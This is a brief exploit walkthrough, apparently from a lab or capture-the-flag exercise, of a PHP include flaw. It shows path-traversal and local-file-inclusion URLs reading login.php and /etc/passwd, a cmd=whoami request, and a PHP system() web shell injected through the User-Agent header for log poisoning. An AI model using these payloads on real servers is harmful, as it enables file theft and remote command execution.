Lets take a look at this exposed PHP code and walk through it line for line to determine how it can be exploited.

The webpage simply displays the output of pageB.php or pageA.php using GET /dashboard.php?show=pageB or GET /dashboard.php?show=pageA

Observing ‘if(containsStr($_GET[‘show’], ‘pageB’)

containsStr($_GET[‘show’], ‘pageA’))’

We can determine that the show=pageB or show=pageA string must be present for successful execution If these conditions are met $_GET[“ext”] : ‘.php’ will append the .php exetension to pageB or pageA. If these conditions are NOT meet you would be meet with message ‘You can select either one of these only’

We can take advantage of this code to view backend php code from other pages of the website by passing the show=pageB string and defining the $_GET[“ext”] : ‘.php’; variable Which could revel useful information to a attacker.

http://x.x.x.x/dashboard.php?show=pageB&ext=../login.php

Further more we maybe able to use this to traverse out of the websites root dir for LFI

http://x.x.x.x/dashboard.php?show=pageB&ext=../../../../etc/passswd

If LFI is successfull command injection is highly likely which can lead to access to the hosting server.

http://x.x.x.x/dashboard.php?show=pageB&ext=&cmd=whoami

Capture with Request Header with Burp and change the User Agent to “<?php system($_GET[‘cmd’]); ?>”